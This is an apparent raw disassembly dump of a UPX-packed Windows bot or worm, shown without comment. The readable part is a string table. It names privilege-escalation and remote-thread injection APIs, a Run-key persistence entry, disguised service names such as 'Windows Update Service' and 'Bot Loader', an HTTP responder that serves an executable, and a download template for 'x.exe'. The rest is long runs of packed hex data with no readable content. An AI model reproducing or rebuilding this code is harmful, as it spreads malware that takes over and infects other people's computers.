; CODE XREF: UPX0:31434C9Aj and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31434CAC dd 1CEC8166h dword_31434CB0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31431F23+62o align 4 aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31431F23+39o align 10h aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31431F23+2Ao align 4 aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31431F23+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31431F23+8o ; sub_3143256D+13Ao align 4 aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31431FAB:loc_31432090o align 4 aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31431FAB+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31431FAB:loc_31431FF2o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31431FAB+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31431FAB+18o align 4 dword_31434D64 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 10h aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31432239+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 aGet db 'GET',0 ; DATA XREF: sub_31432239+3Do aUterm20 db 'uterm20',0 ; DATA XREF: UPX0:3143250Co ; sub_3143256D+148o aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:314324F7o align 10h aUser32 db 'user32',0 ; DATA XREF: sub_3143256D+141o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3143256D+133o align 10h aWininet db 'wininet',0 ; DATA XREF: sub_3143256D+12Co aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3143256D+11Fo align 10h aU20x db 'u20x',0 ; DATA XREF: sub_3143256D+CBo align 4 aU20 db 'u20',0 ; DATA XREF: sub_3143256D+C4o aU19 db 'u19',0 ; DATA XREF: sub_3143256D+BDo aU18 db 'u18',0 ; DATA XREF: sub_3143256D+B6o aU17 db 'u17',0 ; DATA XREF: sub_3143256D+AFo aU16 db 'u16',0 ; DATA XREF: sub_3143256D+A8o aU15 db 'u15',0 ; DATA XREF: sub_3143256D+A1o aU14 db 'u14',0 ; DATA XREF: sub_3143256D+9Ao aU13i db 'u13i',0 ; DATA XREF: sub_3143256D+93o align 4 aU13 db 'u13',0 ; DATA XREF: sub_3143256D+8Co aU12 db 'u12',0 ; DATA XREF: sub_3143256D+85o aU11 db 'u11',0 ; DATA XREF: sub_3143256D+7Eo aU10 db 'u10',0 ; DATA XREF: sub_3143256D+77o aU9 db 'u9',0 ; DATA XREF: sub_3143256D+70o align 10h aU8 db 'u8',0 ; DATA XREF: sub_3143256D+69o align 4 aU19x db 'u19x',0 ; DATA XREF: sub_3143256D+62o align 4 aU18x db 'u18x',0 ; DATA XREF: sub_3143256D+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_3143256D+54o align 4 aU16x db 'u16x',0 ; DATA XREF: sub_3143256D+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_3143256D+46o align 4 aU14x db 'u14x',0 ; DATA XREF: sub_3143256D+3Fo align 4 aU13x db 'u13x',0 ; DATA XREF: sub_3143256D+38o align 4 aU12x db 'u12x',0 ; DATA XREF: sub_3143256D+31o align 4 aU11x db 'u11x',0 ; DATA XREF: sub_3143256D+2Ao align 4 aU10x db 'u10x',0 ; DATA XREF: sub_3143256D+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_314328D7+2Do align 4 aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_3143237F+23o ; sub_31432BAD+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_3143237F+1Co ; sub_31432C62+87o ... align 10h aKtgvjlfibo db 'ktgvjlfibo',0 ; DATA XREF: sub_31431782+4Fo ; sub_31432D2E+57o ... aRt db 'rt',0 align 10h dd 2 dup(0) aSoftwareMicr_1 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31432D2E+32o aClient db 'Client',0 ; DATA XREF: sub_31432D2E+BCo ; sub_31432D2E+F8o align 4 aId db 'ID',0 ; DATA XREF: sub_31432D2E+37o ; sub_31432D2E+75o align 10h aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31432BAD+55o align 10h aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31432BAD+4Eo align 10h aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31432BAD+47o align 4 aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31432BAD+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31432BAD+39o align 10h aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31432BAD+32o align 4 aSystray db 'SysTray',0 ; DATA XREF: sub_31432BAD+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31432BAD+24o align 10h aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31432BAD+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31432BAD+16o align 4 aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31432BAD+Fo align 4 a1: ; DATA XREF: sub_31432D2E+B7o unicode 0, <1>,0 dd 7 dup(0) dword_31435028 dd 0 ; sub_3143237F+80w dword_3143502C dd 0 ; sub_3143185D+53o ... dword_31435030 dd 0 ; sub_31432239:loc_314322E7r ... dword_31435034 dd 68h ; UPX0:31432517w ... dword_31435038 dd 0 ; sub_3143256D+DCw dword_3143503C dd 0 ; sub_314328D7+20r dword_31435040 dd 31430000h ; UPX0:314324FCw dword_31435044 dd 0 ; sub_3143185D+4Ao ... dword_31435048 dd 0 ; UPX0:31432974w ... dword_3143504C dd 0 ; sub_31432728+41r ... dword_31435050 dd 0 ; sub_31432D2E+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31436000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31436000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31437C81o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 4C746547h dd 45747361h, 726F7272h, 72570100h, 46657469h, 656C69h dd 6F6C4301h, 61486573h, 656C646Eh, 72430100h, 65746165h dd 656C6946h, 6C010041h, 6C727473h, 416E65h, 74736C01h dd 74616372h, 47010041h, 79537465h, 6D657473h, 65726944h dd 726F7463h, 1004179h, 65746E49h, 636F6C72h, 4564656Bh dd 61686378h, 65676Eh, 74654701h, 61636F4Ch, 6E49656Ch dd 416F66h, 656C5301h, 1007065h, 7274736Ch, 6E797063h dd 47010041h, 75437465h, 6E657272h, 6F725074h, 73736563h dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh dd 47010041h, 69547465h, 6F436B63h, 746E75h, 65724301h dd 4D657461h, 78657475h, 43010041h, 74616572h, 72685465h dd 646165h, 65724301h, 50657461h, 65636F72h, 417373h, 74655301h dd 6E657645h, 4F010074h, 456E6570h, 746E6576h, 45010041h dd 54746978h, 61657268h, 49010064h, 7265746Eh, 6B636F6Ch dd 6E496465h, 6D657263h, 746E65h, 61655201h, 6C694664h dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 74697845h dd 636F7250h, 737365h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 6F746101h, 73010069h, 68637274h dd 0E9000072h, 14000000h, 1000001h, 646E6946h, 646E6957h dd 41776Fh, 74654701h, 65726F46h, 756F7267h, 6957646Eh dd 776F646Eh, 65470100h, 6E695774h, 54776F64h, 61657268h dd 6F725064h, 73736563h, 1006449h, 72707377h, 66746E69h dd 0F4000041h, 28000000h, 1000001h, 65746E49h, 74656E72h dd 6E65704Fh, 416C7255h, 6E490100h, 6E726574h, 704F7465h dd 416E65h, 746E4901h, 656E7265h, 6F6C4374h, 61486573h dd 656C646Eh, 6E490100h, 6E726574h, 65477465h, 6E6F4374h dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h dd 61655274h, 6C694664h, 65h, 40000001h, 0FF000001h, 2FF0073h dd 0DFF00h, 0FF0001FFh, 6FFF0039h, 34FF00h, 0FF0017FFh dd 9FF000Ch, 4FF00h, 0FF0013FFh, 16FF0010h, 3FF00h, 0 dd 455000h, 2014C00h, 0E07ED200h, 40h, 0 dd 0F00E000h, 6010B01h, 280000h, 120000h, 0 dd 24EF00h, 100000h, 400000h, 43000000h, 100031h, 20000h dd 400h, 0 dd 400h, 0 dd 600000h, 40000h, 0 dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0 dd 1000h, 2 dup(0) dd 2F0400h, 8C00h, 14h dup(0) dd 100000h, 18000h, 6 dup(0) dd 65742E00h, 7478h, 263200h, 100000h, 280000h, 40000h dd 3 dup(0) dd 4002000h, 61642EE0h, 6174h, 105400h, 400000h, 120000h dd 2C0000h, 3 dup(0) dd 4000h, 5000C0h, 311000h, 54C900h, 57965900h, 6849FAFAh dd 0B7000E29h, 844F4CCFh, 0A2623FE0h, 0DC24106Ah, 0DED1BA53h dd 44810B66h, 5F0DC766h, 0B73BD68h, 0E4D6E6CDh, 0DE196664h dd 164C2621h, 0FC5644DEh, 31E07589h, 51B36968h, 3EA2E2Eh dd 0C8BF9C37h, 0E89C3A7h, 6CD8E087h, 770D7C13h, 0A8433716h dd 18D3B345h, 9B6BDB07h, 0F88C0D0Bh, 49190640h, 73F27046h dd 6A9821CDh, 4634332Eh, 17273C8h, 37E0DE64h, 3010CCDFh dd 8C0F4608h, 0D0BD8027h, 740B89E5h, 0C5803126h, 43089D01h dd 0D0EECD70h, 0BC3C0007h, 115690F0h, 0B66061EEh, 0AA425F0Ch dd 0C1FF15Ch, 11784396h, 0C9EC0CB3h, 9705C87Ch, 0F8786E0Ah dd 894BE6A1h, 25620546h, 0DA46568h, 0AEC28B6Dh, 92A2043Bh dd 3CF01Ch, 27BE83Bh, 100BC86Ah, 4824A32Eh, 86024A19h dd 0A0CF6043h, 2163390h, 0B9AEBB03h, 0A73D7D95h, 769F6801h dd 664A48E6h, 3A21B736h, 1B5AB7CCh, 3DB9A4E0h, 6A7684E4h dd 96F42A70h, 364719B4h, 5EC86007h, 7A97640Ah, 39F0D92Eh dd 0A2280084h, 3C4B283Fh, 0CDCB59B2h, 98B9B26Ch, 23BDEBE2h dd 0DC0167A7h, 0C77E500Fh, 0BE1F218Dh, 0AC68F60Eh, 0D328C00Dh dd 0C676E6C9h, 0E57A08A1h, 0DB0C7A04h, 0C8611488h, 2DC54C20h dd 6C84BF34h, 2EDB1CD6h, 0B698DE40h, 4192FC84h, 40BCDE44h dd 0C27190D6h, 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh dd 67E9ACF9h, 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h dd 1CF25B07h, 96F41276h, 0A19DE9C3h, 4F0CEF1Bh, 7BC87C6Ah dd 64B1E3C3h, 0C9BE4934h, 991DD27Bh, 90E154E4h, 0B42DE924h dd 48B9B999h, 0EDCF7881h, 0C80A5848h, 0CF88286h, 6633F415h dd 2665846h, 7808747Ah, 41BA9D5Fh, 5FF4C65Eh, 7D1C0F8Ah dd 9C1369E0h, 0AC204D0Ch, 0C0A8357Fh, 5F68683h, 572448F8h dd 565FC937h, 5A7457D8h, 74F80E14h, 0B8C8684Bh, 0CA8950BAh dd 0E83D7496h, 4B4B3F6Ch, 0A44120C9h, 0FFC55FFh, 0F6B9ADE8h dd 50E4B92Ch, 0E9628ACh, 0CCDA6AD9h, 0F81B02F0h, 0E48C0009h dd 81DB40ACh, 42F47558h, 29C587EEh, 8B181F13h, 6701400Dh dd 0BFEEFFB6h, 3C418B2Fh, 68C10357h, 488B9758h, 50788B34h dd 0A0F44D89h, 8D759CB8h, 1BDBD84Bh, 0BEF09153h, 0B002F0ACh dd 4751EB01h, 0ED74EC12h, 1AC55A0Ch, 0D7240Dh, 9300CA82h dd 18090E6Dh, 0B22ECDEh, 0F84DAFDFh, 1C185051h, 412A6897h dd 8958D8ABh, 60FE5DB4h, 0CAD2C68Bh, 1C346B03h, 0B7680630h dd 59AB1976h, 0BE7DF055h, 135BAB62h, 0F03E45E6h, 0DC50EF51h dd 34EC5F13h, 34A110B0h, 0FFFAD6BDh, 172783C4h, 5577D06Ah dd 74C73BECh, 805F8C78h, 1BEB1605h, 684D1868h, 3959E010h dd 0E5CC857h, 8D405FCh, 0F8041D74h, 0FC58EFA2h, 4251511Dh dd 2F0DC32Bh, 69310F60h, 41B60D10h, 0BC258964h, 22B1AFDDh dd 138575D6h, 590FECB2h, 5D33DB2Dh, 6AF9C267h, 803CC0B6h dd 624EE90Ch, 50A85089h, 0C42C507Dh, 0AC297488h, 8020195Dh dd 0B3F8B55Bh, 7C8B5743h, 57D21424h, 67FFF7Eh, 1A87178Bh dd 8861C280h, 3B461E14h, 80E97CF7h, 0E030E036h, 4A003B24h dd 86444954h, 2EDB78CEh, 57AC5A5Fh, 2166DB56h, 303A5DCh dd 0F0DC732Fh, 25B81950h, 648D62h, 0E377ACAAh, 954D04F0h dd 49F408C8h, 0DBA32668h, 0F00CFADAh, 3408C7FFh, 0DA65B27Bh dd 2E2ACC34h, 0A0A7550h, 666B5CE8h, 1A20BC54h, 0B7ED5818h dd 7C64F85h, 13B7FB8h, 0C408B14h, 2C01008Bh, 86F8E76h dd 24448D51h, 1134215Fh, 9A7C2D3h, 245903DBh, 0BBD01507h dd 7743A19Eh, 2FCC2007h, 3233E433h, 0F8C83FDBh, 8510E7C1h dd 0A05B60Bh, 200CD86h, 0CF125D8Bh, 1C0BABECh, 7FC20099h dd 7B55C653h, 139E2416h, 0C0934521h, 25AAECF0h, 6E5D868h dd 5B4ECF20h, 17B5ADE7h, 675641F0h, 35953336h, 0A33D986Ch dd 8CC6EC66h, 503044B7h, 0B370FE47h, 4D80C581h, 0EBDA14A5h dd 54B3174Eh, 0A134007Ch, 37FBAE33h, 7900B9F0h, 0C13BC72Bh dd 0C18B0272h, 0FC292BE1h, 0A1DDBDDDh, 0C7031828h, 1374AC23h dd 1172233Dh, 4678516Ah, 40F8784Bh, 0EC13C4EBh, 0E1B462D9h dd 0D8117750h, 0DC9A941Eh, 68159E4Dh, 68030B68h, 9B6B3A64h dd 3A3C97C5h, 8F535453h, 52CC7D18h, 9824D483h, 0C423347Dh dd 30DE04C2h, 4FB2F457h, 0B1B1087Dh, 0E868C3D0h, 168EE4Eh dd 0B8BAAFDEh, 89FF6806h, 0ED04841Dh, 0D4244BA9h, 539100F2h dd 9886937Bh, 3A01026Dh, 1CD680A6h, 0FD775A8Dh, 0E741A4Dh dd 2F6946CFh, 0CA3E0CDh, 0ACEF4BC2h, 0A4FEA365h, 565153FCh dd 635B3A5Bh, 68DC3A86h, 87DF2656h, 5EF9119Bh, 10C25C19h dd 1B4D424Ch, 56C05E05h, 9DFD0C4Bh, 89E8D2F4h, 50DEC5Dh dd 1FFF25FFh, 0BEEC1BFDh, 0A3C33A04h, 0E774433Ch, 84CC8A1Fh dd 50DF74C9h, 937ABE3h, 5F42EA6Bh, 4C85A544h, 646530B7h dd 0B97B480Ch, 5F7D35FBh, 1FD814F8h, 68B1114Ch, 0D9C22239h dd 9111D5Bh, 53E2EB62h, 0CC455FCFh, 4384B982h, 0B6700190h dd 0AE3AF759h, 0D6B03340h, 36023E11h, 0E687A60Fh, 0B8803AD6h dd 3044E468h, 0A3AB1B63h, 7C74E040h, 4AB27633h, 34A37B69h dd 767B781Ah, 0B73D6182h, 29E44552h, 43041F0Fh, 1BB37D9Ch dd 682A1DA9h, 0A713256Dh, 13ED7ED1h, 1586EB0Dh, 35699969h dd 0AC188438h, 397044C6h, 4B104D40h, 0D290E409h, 3372396Ch dd 88454ADCh, 8C06EF9Ch, 238C9094h, 941C8E47h, 9C7C9884h dd 0E472A074h, 0A46C91C8h, 0AC5CA864h, 1C8E4754h, 0B450B039h dd 0BC48B84Ch, 91C8E444h, 0C440C023h, 8E34C83Ch, 0CC72391Ch dd 0D42CD030h, 0C724D828h, 0DC472391h, 0E41CE020h, 76CD9018h dd 9C10C780h, 0A36CE145h, 7ADB72F1h, 2FCBEECh, 730A8384h dd 0B806ED12h, 4F8442B4h, 59B8885h, 9B0CFF59h, 0EBD9C870h dd 0B00E1AE8h, 0E0F91A6Ah, 95391A17h, 8683974h, 32ACB94Eh dd 45936C72h, 0F8064E00h, 21760C4Dh, 0A8F07261h, 49BF140Ah dd 79B7676Eh, 0EF15237Fh, 0F1185D0Ah, 33C822E0h, 559C5029h dd 0D747E90Fh, 18B4146Dh, 0AA138806h, 1412E3EBh, 17A7049Eh dd 0DBA3BD23h, 63123818h, 7FA48071h, 8FD5BDh, 458A4FBBh dd 0FF77530Bh, 83DBDB32h, 3A518701h, 5D3831D9h, 0E93125DBh dd 5D88E291h, 0B8099D0Bh, 80CF1559h, 4CB72CDFh, 0F1F7D233h dd 0FE9BD103h, 0CB65EBC3h, 0FFFB80F8h, 60C6BD72h, 1C0F5674h dd 7A303876h, 41586667h, 4F870ADBh, 40A7F05h, 3B6B3618h dd 9A0B0918h, 17692573h, 0F758BECh, 37272804h, 0AC01D0C8h dd 8147822Bh, 6CE27695h, 4C9FA16Ah, 7A595D5Eh, 2CD74CAEh dd 0F0A26472h, 7832DB7Ch, 0FD720A2Eh, 35F8FF04h, 0FEF42Fh dd 0F7887F3Ch, 0B18BB06Ah, 4D8B6C3h, 0A9DCFD3Bh, 0EC04A23Eh dd 579F6764h, 9B572F9Dh, 4B3DB21Ch, 1359F8E0h, 4A36FF8Ah dd 0B2C54ADCh, 68FCEE75h, 0C8EC3C27h, 0BDD3A21Ah, 70849ED3h dd 1C180961h, 4C5AA537h, 52AD630h, 508FCC4Fh, 18B6BD78h dd 0FC68BAE3h, 67B7C156h, 0B3C443Eh, 0A468B003h, 0DCB71E4Eh dd 11104580h, 6842E231h, 12F7D70h, 0B80C613h, 0C0B343DFh dd 5579BB02h, 8E579756h, 663C344h, 4D1DE6BCh, 30E26CA4h dd 0FD1F0C43h, 53146CF4h, 483776CDh, 20BF66Bh, 4838506Ah dd 76D9A65Dh, 0D005C7DFh, 1974F896h, 9D01480Bh, 0BDDCCE60h dd 141A055Eh dd 0E103D851h, 1806DE27h, 0C9FB81D3h, 0D6530D74h, 0B6844203h dd 1D1053C7h, 0DB04C3Bh, 1824C37Dh, 0ED85ED3Ch, 10B1117Eh dd 0EED82C28h, 144DEDB0h, 0A40598EFh, 200DF2EBh, 75324B74h dd 6DDEB65h, 0EB45C0B0h, 27D53F68h, 60B11BA2h, 0B5150C64h dd 43A5106Fh, 14083BE8h, 6CD7513Bh, 18D4C859h, 18430856h dd 31883EF6h, 3D566C2Eh, 0A52ADC74h, 4DE702DBh, 2050DF61h dd 4E05B110h, 3081896h, 6B0F5EB6h, 557E2CD1h, 0FAEDC68Bh dd 6764C82Eh, 532C56ADh, 67005556h, 270C422Dh, 0C520A31h dd 2C81C931h, 0C45D0C04h, 0BB679061h, 0E0530128h, 0F40B89FBh dd 8E3D4E2Dh, 1E3C4094h, 1F10365Ch, 794E7A1Ch, 0F8E510F7h dd 0EB778B64h, 687AA239h, 17D86635h, 0B13B3Bh, 2005C710h dd 0A24F7789h, 7DF21E99h, 1E748D47h, 0BD02609Bh, 0AE48FCA2h dd 0FE8194DCh, 0B5FF1C2Ah, 0FFF51EFh, 0E6CCCD1Fh, 60085282h dd 0D5CCE50h, 76EC4687h, 3CB787BDh, 89D0D036h, 0B457E273h dd 23914FECh, 6D846C7h, 0B4D8C0D4h, 0C8E47239h, 0A0E0ACDCh dd 7CE888E4h, 1C8E4730h, 50F060ECh, 45F340F4h, 86B764D3h dd 0BE70BF0Bh, 8B858E85h, 188B8A05h, 0A0406C49h, 8357C491h dd 0F4D50E17h, 1D101B05h, 8340F10Bh, 326A8452h, 0A775BFAFh dd 4D84628Ah, 74767830h, 5D74B409h, 653FA8CCh, 0A5636A88h dd 0FE0B84C8h, 28A19C09h, 8303E083h, 866305C0h, 5BD3CAA3h dd 51CFC42Ah, 10B9186Eh, 661C3D1Eh, 0D6CE9DEEh, 3F140E26h dd 3D9A0497h, 0D56150E8h, 1425A00Bh, 0CD4B4D21h, 0D2415662h dd 7D09E592h, 19419836h, 0C401F454h, 2E987A04h, 0AB8BE407h dd 0B408B9F6h, 481FC523h, 436839C7h, 2565140Ch, 84102550h dd 0E04DBFDDh, 0BF501D6Ah, 3C4C4F18h, 0C1D0514Fh, 743F81EAh dd 0BB0A3D37h, 32BD758Ah, 53D942B3h, 60D8B3F4h, 53BC4906h dd 0BDB3383Dh, 0EBB17EE6h, 32CE590Fh, 65B068B6h, 0E227A0C1h dd 0D12A0E65h, 58C22638h, 0D9B9DA18h, 0BB4634B2h, 5E1C0DB9h dd 0EB05066h, 57125E1Eh, 964EC6F0h, 0C6314CEEh, 0B6413BBBh dd 2CFD90CCh, 90B650B6h, 480718B7h, 6015EB0Ch, 2D1880E5h dd 0AF2509CDh, 5D32BA1Eh, 44330C69h, 0EC5B3D5Ch, 6A7E6883h dd 0CC401113h, 84D0A99Bh, 311BFF00h, 661DF805h, 0F4109E46h dd 0BE511FF0h, 0B048D56Fh, 1472048Dh, 2D0BE981h, 0FD8FEDF5h dd 17018504h, 0C82BEC73h, 8B0CC48Bh, 0D8088BE1h, 0FF6ED6C8h dd 435C5004h, 4055C64h, 58D8D800h, 0A3000049h, 420900A8h dd 6C5D2FCh, 5224F102h, 80314153h, 0FFFFFFC8h, 0F50101DDh dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh dd 5E1A9544h, 0FFFFFFE8h, 85A03261h, 949F6A1Fh, 843994FFh dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 377FFFFFh dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h dd 3B656C62h, 49534D20h, 0ED6FFFF7h, 15362045h, 6E695709h dd 73776F64h, 20544E20h, 29312E35h, 2EECF734h, 0C7E445h dd 0C40104D4h, 0F7DF0EB4h, 90A0CF3Ch, 68047480h, 0CF3D580Eh dd 48097CF3h, 30D4743Ch, 9364DF3Ch, 10222045h, 0B600304Ah dd 0F8F90DFFh, 76631340h, 75722E76h, 0D8DB777Eh, 700D6F6h dd 976C6465h, 0C1660F65h, 0EDFFCA65h, 616573FDh, 0E686372h dd 626F721Fh, 6863786Fh, 6F676E61h, 0D2E6EDFFh, 0C74651Fh dd 622E6472h, 61007A69h, 6B686328h, 91B61762h, 740C6D61h dd 24782D06h, 0E6EDB6CDh, 6F6C0600h, 6B37620Eh, 0FBDBF647h dd 27626B6h, 76742E7Ah, 6F74111Bh, 176E2E70h, 30B60215h dd 27730F69h, 3FC2E33h, 0F788DB6h, 6C756461h, 4B652D74h dd 6DDB7269h, 3380CDFBh, 73A66E6Fh, 622E744Eh, 2B01F767h dd 67694F7Ch, 77780032h, 0FECE2C61h, 626AED6Dh, 9B00AD62h dd 6166617Ah, 221F2EA8h, 655DDBE1h, 61AF5C23h, 0F1646362h dd 65FFDBB7h, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h dd 0FF7A7978h, 54BFFFF2h, 44434241h, 48474645h, 4C4B4A49h dd 504F4E4Dh, 56555451h, 5A595857h, 1B9BFBF8h, 49642563h dd 6F530044h, 5C9E7466h, 706C694Dh, 0F90656BBh, 0DA575C0Dh dd 0FE007374h, 4774E30Fh, 74684F31h, 2F3A7074h, 0C273252Fh dd 0BC0EE6Fh, 2EC3912Fh, 3F706870h, 0EDF9ED3Ah, 260F3DDBh dd 66E6373h, 6E692664h, 0F3B7666h, 3DF6EC76h, 13263032h dd 0EB373D74h, 32313958h, 0BF87B237h, 3101D06Bh, 3030383Ah dd 0DF07652Fh, 80FFFF00h, 5DDF1030h, 0B966C933h, 758D01EEh dd 8AFE8B05h, 6FFFE206h, 7993CDBh, 302C0646h, 88993446h dd 0EDE24707h, 0DAE80AEBh, 0B46FF7FEh, 676507DFh, 9993712Eh dd 0FD1201C9h, 16FD91BDh, 0DFFFEFF7h, 6872C107h, 66FD42AAh dd 0BA10FDAAh, 98A91C14h, 98F3C91Ah, 0FFB308F1h, 2865BB1h dd 9010C071h, 9237CB5Fh, 781C9659h, 0F93ED3Ah, 57E414FBh dd 3A0A7D71h, 9DF34571h, 9D2304F1h, 989BEFBh, 119C04F1h dd 0EF67B340h, 0F3FD8EEDh, 1C10F0E3h, 59B20BDCh, 25C99B60h dd 3D8F9601h, 414D9F6h, 71CA17A1h, 688D2B9Eh, 0EDAD9161h dd 1A4637B3h, 111D960Ah, 0C850B228h, 6D9FED00h, 0DC14996Fh dd 12255557h, 91C0A44Eh, 0FD994912h, 0EDDEDFECh, 140054F7h dd 0CBCA3AC4h, 0FF1C3B71h, 6C21E424h, 1ADD87B3h, 8FCDCDCFh dd 3F812C66h, 0FBB66F1Eh, 0B8B0FB9Fh, 12CDC383h, 0CBC9A85Dh dd 7F64251Dh, 24AD9DB2h, 0A6485A0Bh, 0B314C096h, 1BC9FECBh dd 0EBA7294Ch, 0E9BA9CF3h, 0D9FFF716h, 26F434F7h, 0EFCF571h dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 766FFFEFh, 16A0A8ECh dd 0FFC5B701h, 0E9ECE9EDh, 0E1FCB7FDh, 0FBBFD2Ch, 0F5CA0161h dd 0F25AFCFCh, 0FCF7EBFCh, 0FFABAAF5h, 0D6BFFFE5h, 0AAF934C7h dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h dd 67F0BEECh, 3519BF30h, 95D91451h, 2A91720Ah, 0FFFBC871h dd 0D2EB20FFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah dd 474A9A8Bh, 46FEDFFFh, 9BAB9EEBh, 20A319DBh, 0DDA26CECh dd 9EED85BDh, 81E8A2DFh, 0FDBFFFCDh, 125544EBh, 961FBDC8h dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BBF8105Ah, 960B09FFh dd 664922D0h, 12FEFD7Fh, 0C25AA987h, 6EDB4095h, 1285026Fh dd 5A910482h, 9CFF7CBh, 0A767F9B9h, 4D53FF85h, 53187242h dd 0F4BFFFC8h, 62FEFFCFh, 43500200h, 575445ABh, 204B524Fh dd 474F5250h, 0ED624152h, 204DE35Bh, 4C17CD31h, 24D4E41h dd 0EB52B70Ah, 3D66D390h, 676B03DFh, 4BB696EBh, 0E707587h dd 27611A33h, 1F2A234Dh, 583274B6h, 32323221h, 5833312Eh dd 18FE66D3h, 8B323C20h, 0C95A25A4h, 7A0773C8h, 0DBEC1B1Ah dd 23FF0Ch, 140A1104h, 0DD40520h, 185DADEh, 4B4C0069h dd 68505353h, 4BE48F6h, 8829772h, 240057E0h, 0EB605DCDh dd 6F30006Eh, 3A73009Dh, 7B7B2274h, 90130B1h, 3500398Ch 